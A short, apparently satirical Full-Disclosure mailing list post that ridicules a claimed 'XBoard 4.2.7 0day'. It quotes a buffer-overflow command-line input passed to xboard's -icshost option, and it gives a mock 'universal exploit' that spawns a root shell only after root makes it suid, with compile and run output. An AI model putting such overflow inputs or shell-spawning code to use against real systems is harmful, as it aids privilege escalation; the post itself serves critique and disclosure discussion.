> /** > ** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY ! > * Oh yeah, xplo for non-suid prog is real oday.
I can show u one universal exploit code for ALL linux/x86 boxes! And u will not need to exploit bofs in non-suid binaries in future! This is real 0day! Do-not-distribute!#@&(*)$#@ Are u ready??! Here it is: ====zer0-day==== int main() { setreuid(0,0); execl("/bin/sh","sh",0); } =====end====== Let's check! # gcc -o zer0-day linux-own.c # su nobody sh: /root/.bashrc: Permission denied sh-2.05b$ id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) /* here we are waiting when somebody with root-access will make it suid. */ /* or if root is your friend, u can ask him to do it. */ /* or if root == you, just su (chown root.root if needed) and chmod +s */ /* or somehow it will be suid by default? but i dont think so.. */ /* anyway... */ sh-2.05b$ ./zer0-day sh-2.05b# id uid=0(root) gid=65534(nogroup) groups=65534(nogroup) sh-2.05b# Yea! We did it!! >[EMAIL PROTECTED]:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print >"\x7e\xfd\xff\xbf"x166'` >sh-2.05b# id >uid=0(root) gid=100(users) groups=100(users) <-----on my box all of >the programs r SUID :P just demonstrated. As u c, on my box too =) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html